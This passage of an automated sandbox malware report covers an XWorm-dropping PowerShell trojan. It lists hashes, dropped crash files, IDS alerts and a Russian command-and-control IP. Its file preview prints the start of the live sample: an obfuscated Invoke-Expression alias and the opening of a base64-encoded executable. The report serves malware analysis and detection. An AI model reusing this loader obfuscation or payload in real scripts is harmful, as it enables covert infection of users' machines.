                      https://go.micropowershell.exe, 00000000.00000002.1427937980.0000021380CF7000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1448591065.0000021390218000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Licensepowershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Iconpowershell.exe, 00000000.00000002.1427937980.00000213812F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://upx.sf.netAmcache.hve.12.drfalse
                                  		high
                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.1427937980.0000021380001000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1427937980.0000021380001000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2953943377.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1427937980.0000021380228000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        92.255.57.155
                                        		unknownRussian Federation
                                        		42253TELSPRUtrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1577166
                                        Start date and time:2024-12-18 08:14:11 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 42s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:15
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:WErY5oc4hl.ps1
                                        renamed because original name is a hash value
                                        Original Sample Name:a7ee0a83c40c1d71e9730e1cbf6520b023952fb137a32a6449bd0edffcedf3d5.ps1
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winPS1@9/10@0/1
                                        EGA Information:
                                        • Successful, ratio: 50%
                                        HCA Information:
                                        • Successful, ratio: 93%
                                        • Number of executed functions: 14
                                        • Number of non-executed functions: 2
                                        Cookbook Comments:
                                        • Found application associated with file extension: .ps1
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 20.189.173.20, 13.107.246.63, 4.245.163.56, 20.190.147.7
                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 7296 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtSetInformationFile calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        02:15:24API Interceptor7x Sleep call for process: powershell.exe modified
                                        02:15:28API Interceptor2917568x Sleep call for process: RegSvcs.exe modified
                                        02:17:54API Interceptor1x Sleep call for process: WerFault.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        92.255.57.155anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                        • 92.255.57.155/1/1.png
                                        https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                        • 92.255.57.155/1/1.png

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        s-part-0035.t-0009.t-msedge.netvsuotNfeN7.ps1Get hashmaliciousUnknownBrowse
                                        • 13.107.246.63
                                        credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                        • 13.107.246.63
                                        http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1Get hashmaliciousUnknownBrowse
                                        • 13.107.246.63
                                        https://pdf-ezy.com/pdf-ezy.exeGet hashmaliciousUnknownBrowse
                                        • 13.107.246.63
                                        https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0ZGet hashmaliciousHTMLPhisherBrowse
                                        • 13.107.246.63
                                        https://drive.google.com/file/d/1t3oVTU9WVeXXW61-QBDfjBrcece1DEFY/view?usp=sharingGet hashmaliciousUnknownBrowse
                                        • 13.107.246.63
                                        http://office.yacivt.com/wriEcFSZGet hashmaliciousHTMLPhisherBrowse
                                        • 13.107.246.63
                                        https://1drv.ms/w/c/17cc1e7b64547fa0/ER4uyAUCto9GkfZ_Sw-4_NAB9TeJj_jWV9oRzb3kdQINFQ?e=4%3aaVtPRh&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                        • 13.107.246.63
                                        file.exeGet hashmaliciousRemcosBrowse
                                        • 13.107.246.63
                                        nsdksetup.dllGet hashmaliciousUnknownBrowse
                                        • 13.107.246.63

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        TELSPRUMiGFg375KJ.exeGet hashmaliciousXWormBrowse
                                        • 92.255.57.155
                                        anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                        • 92.255.57.155
                                        sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                        • 92.255.57.75
                                        ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                        • 92.255.57.75
                                        fa20b849ebe7c53d59f3ed0fcfac8445ea08e7296af5a.exeGet hashmaliciousStealcBrowse
                                        • 92.255.57.89
                                        LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                        • 92.255.57.89
                                        SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                        • 92.255.57.89
                                        mMgFHz9PdG.exeGet hashmaliciousStealcBrowse
                                        • 92.255.57.89
                                        vCZfRWB1kd.exeGet hashmaliciousStealcBrowse
                                        • 92.255.57.89
                                        1891f566c018182f1b5826b5fe2a05d6927aff15638d2.exeGet hashmaliciousStealcBrowse
                                        • 92.255.57.89

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegSvcs.exe_89a31e8aa723437aced0b47a7472cbf33eaf4d_74bcc9ed_10da03e8-d08f-4519-96f6-2f06e20d54b5\Report.wer

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.175770247375884
                                        Encrypted:false
                                        SSDEEP:192:8zfIk8Q/q/0BU/SaiTHy88LkmzuiFUZ24IO8a9:oCQ/xBU/SauSL9zuiFUY4IO8a9
                                        MD5:26E2BEEE16DD3685F349D1BFE7F825CA
                                        SHA1:59A2086B6E68DAA6266EAF5AB4C8A6D39AFDA0BC
                                        SHA-256:B8C401A2C3EC34E753974185B1380E94594775DE4AA5D78C7CDE0634EBCFF0E5
                                        SHA-512:77EB14C20F982884E4B87E6ED14BC3D6894FD6EC41718D969099A936BF0A470DC60AD391E576B8C34ABB2E0CFADF3F10004BF70B3ECC5CBAD431BDCF1DC46126
                                        Malicious:false
                                        Reputation:low
                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.7.9.8.5.0.0.7.9.5.6.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.9.7.9.8.5.0.6.2.6.4.4.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.d.a.0.3.e.8.-.d.0.8.f.-.4.5.1.9.-.9.6.f.6.-.2.f.0.6.e.2.0.d.5.4.b.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.6.e.4.8.1.c.a.-.7.c.4.4.-.4.2.6.b.-.9.7.5.9.-.3.8.d.9.8.4.9.0.c.b.c.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.8.8.-.0.0.0.1.-.0.0.1.4.-.2.2.2.4.-.d.4.9.b.1.c.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA716.tmp.dmp

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 07:17:30 2024, 0x1205a4 type
                                        Category:dropped
                                        Size (bytes):334771
                                        Entropy (8bit):3.4637050545638317
                                        Encrypted:false
                                        SSDEEP:3072:CHdIhu0pZIbxwu+f/j5H1JjQrc4uEqmydLTgdnK:CWRpZoxwb1VJjQrc47y5Tgdn
                                        MD5:88D0EC9D93C0674C66CE46CC4BD78ADD
                                        SHA1:AAED8DAA92A5F43E1A941EA9DB650509A02FC470
                                        SHA-256:3430C16F4FF436E6B445B07E25BC01B9A6904A4DA156E7147D347064F0954868
                                        SHA-512:C1FC99D48DB0F0BFE65AD932DC98C49D530D9D24FC2373C274617A20D3C67CE0ACECC460B453464B81154C16135952DADCB22A2EECB4463C7B0AF7B981149E58
                                        Malicious:false
                                        Reputation:low
                                        Preview:MDMP..a..... ........wbg............4........... ...H.......$...h'.......&..$e..........`.......8...........T............?...............'..........x)..............................................................................eJ.......*......GenuineIntel............T............vbg....0........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA86F.tmp.WERInternalMetadata.xml

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):8356
                                        Entropy (8bit):3.6918501955114915
                                        Encrypted:false
                                        SSDEEP:192:R6l7wVeJ4g6hJue6YwXSqgmfZQFpr+89bmssAsfcTnim:R6lXJf6/6YYSqgmfqPmssTfc3
                                        MD5:1A7ADAFA3F6E6292AF135B55B5F0AF9F
                                        SHA1:9903767B8E4283A6089205F81207C1E743039567
                                        SHA-256:AC1C8D262F1F4D87D7451767B3AFA4425AAB81FE0630D0E20B16A974B6E68802
                                        SHA-512:79FCB456C4F3FC79EEACDED82B1FD29D0E53A8B748087F168F972742707AE09F166D1E8D54288DE08C5AA4940FC8AF3EA6921659BD866B5471EEDE2E537DE4F1
                                        Malicious:false
                                        Reputation:low
                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.6.0.<./.P.i.

                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERA89F.tmp.xml

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4726
                                        Entropy (8bit):4.446919496950991
                                        Encrypted:false
                                        SSDEEP:48:cvIwWl8zsOJg77aI9dmnWpW8VYpYm8M4J3uFu9+q8vYzmDI8d:uIjfEI7/mW7VlJvKKmDI8d
                                        MD5:86996530BD13F4F14EDDB845DEAE4E44
                                        SHA1:D67EB214D558A91A614F3A45483CEEB4399D4118
                                        SHA-256:6B4954DE6C7409E6C37E4036D5E3512BADC714B33D5B3B4F138577EDF92B8729
                                        SHA-512:521BA2F33335890D6D88AD5B0BF46FE1197E335BC975BF579A7A67292FA753079CFA1D1ABDC01BF14F8FC9BE47B063E57EA1DF0E6913080CDB0EBAF08F8B685E
                                        Malicious:false
                                        Reputation:low
                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="636380" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):1.1628158735648508
                                        Encrypted:false
                                        SSDEEP:3:NlllulLhwlz:NllUO
                                        MD5:F442CD24937ABD508058EA44FD91378E
                                        SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                        SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                        SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                        Malicious:false
                                        Preview:@...e................................................@..........

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0tf3s0rn.mym.psm1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oeawf5cb.5uc.ps1

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6225
                                        Entropy (8bit):3.7414113226775694
                                        Encrypted:false
                                        SSDEEP:48:Ko2TLal4FCCFU20O2ukvhkvklCywJc3YaS2l68SogZokcJTJaXYaS2lZ8SogZokJ:8TfCCKrGkvhkvCCtJ2pS2YHHPpS2dHHJ
                                        MD5:43AEAC48F006DE97EE889CA123262C8F
                                        SHA1:D5704EF8EAD3544E23C1690735485B4C29C8AD30
                                        SHA-256:43D5F0263E560CD77E3B27D40A84DE43B0CAD7E632EB11653BEA072BF746C84A
                                        SHA-512:4F878B049265237D8765660AB8F1A5F1D1A579DC0A6EFCCF65BA9F6DB2AA728FEE526403F71350AADD6C5E84CB6C38A2029100621B293F565626EDF6A510CFAD
                                        Malicious:false
                                        Preview:...................................FL..................F.".. .....*_.....C..Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...%....Q....V..Q......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.9..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EW.=.Y.9..........................l..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.9..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.9.............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.9....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.9....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.9....9...........

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5SQSDFX549WA1XUUCAAY.temp

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):6225
                                        Entropy (8bit):3.7414113226775694
                                        Encrypted:false
                                        SSDEEP:48:Ko2TLal4FCCFU20O2ukvhkvklCywJc3YaS2l68SogZokcJTJaXYaS2lZ8SogZokJ:8TfCCKrGkvhkvCCtJ2pS2YHHPpS2dHHJ
                                        MD5:43AEAC48F006DE97EE889CA123262C8F
                                        SHA1:D5704EF8EAD3544E23C1690735485B4C29C8AD30
                                        SHA-256:43D5F0263E560CD77E3B27D40A84DE43B0CAD7E632EB11653BEA072BF746C84A
                                        SHA-512:4F878B049265237D8765660AB8F1A5F1D1A579DC0A6EFCCF65BA9F6DB2AA728FEE526403F71350AADD6C5E84CB6C38A2029100621B293F565626EDF6A510CFAD
                                        Malicious:false
                                        Preview:...................................FL..................F.".. .....*_.....C..Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...%....Q....V..Q......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.9..........................3*N.A.p.p.D.a.t.a...B.V.1......Y.9..Roaming.@......EW.=.Y.9..........................l..R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Y.9..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Y.9.............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Y.9....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Y.9....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=.Y.9....9...........

                                        C:\Windows\appcompat\Programs\Amcache.hve

                                        Download File
                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                        File Type:MS Windows registry file, NT/2000 or above
                                        Category:dropped
                                        Size (bytes):1835008
                                        Entropy (8bit):4.417560937661047
                                        Encrypted:false
                                        SSDEEP:6144:ucifpi6ceLPL9skLmb0mWSWSPtaJG8nAgex285i2MMhA20X4WABlGuNa5+:7i58WSWIZBk2MM6AFBco
                                        MD5:83B3AF806388C91463E90455198DE80E
                                        SHA1:8EF260ABC2ED5D464E7A5A59A9FB2A9662FEA2EC
                                        SHA-256:6F3D8639D4B18337F5D6812AE38999CD7DB803E3720492A3BC3BC234A7BAD28B
                                        SHA-512:F18C8B772C98FD3DB99B7CBDE4209C9251EA9F304C25E2AB2C69A77BE95201D123D4FE98247082C93A94793559A8ED57CC45FA34EE6500CA18203A0CDA108E42
                                        Malicious:false
                                        Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmj.#..Q................................................................................................................................................................................................................................................................................................................................................4.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:ASCII text, with very long lines (65463), with CRLF line terminators
                                        Entropy (8bit):5.196029101775158
                                        TrID:
                                          File name:WErY5oc4hl.ps1
                                          File size:143'860 bytes
                                          MD5:f20ada3727c5c319d22931d7bc63a007
                                          SHA1:242d29871bb91f4d3a48cdde6a46df7f458ae22a
                                          SHA256:a7ee0a83c40c1d71e9730e1cbf6520b023952fb137a32a6449bd0edffcedf3d5
                                          SHA512:65a399b7cee81d43cc5f55667f6ed3a19a90a92647b52e18606cfd6599d00b59038a6c126543506e121cca939efca40703ba9deb11eb18bd1f02031fc3b89d32
                                          SSDEEP:3072:tDY+KK5sCTIO5MTe4ydXHLM8DIVI96igQycLQxvBzAqx9aKVo6sQ4aR6s:tDY+xiYIO5MTe4ydXHLM8DIVI96igQr4
                                          TLSH:95E36C330202FD8F6B7F2F84F5043E951C68247B8B599558FACA0AA925B6520DF39DF4
                                          File Content Preview:ipconfig /flushdns...... $t0='BBBaIEX'.replace('BBBa','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAE

                                          File Icon

                                          Icon Hash:3270d6baae77db44

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-12-18T08:15:42.199229+01002858800ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:15:42.687040+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:15:42.745508+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:15:55.132992+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:15:55.134693+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:15:58.442712+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:15:58.442712+01002858801ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:07.680452+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:07.682242+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:16:20.460191+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:20.463819+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:16:28.596991+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:32.774138+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:32.775981+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:16:36.366021+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:36.368542+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
                                          2024-12-18T08:16:43.293961+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes192.255.57.1554411192.168.2.749723TCP
                                          2024-12-18T08:16:43.296108+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.74972392.255.57.1554411TCP
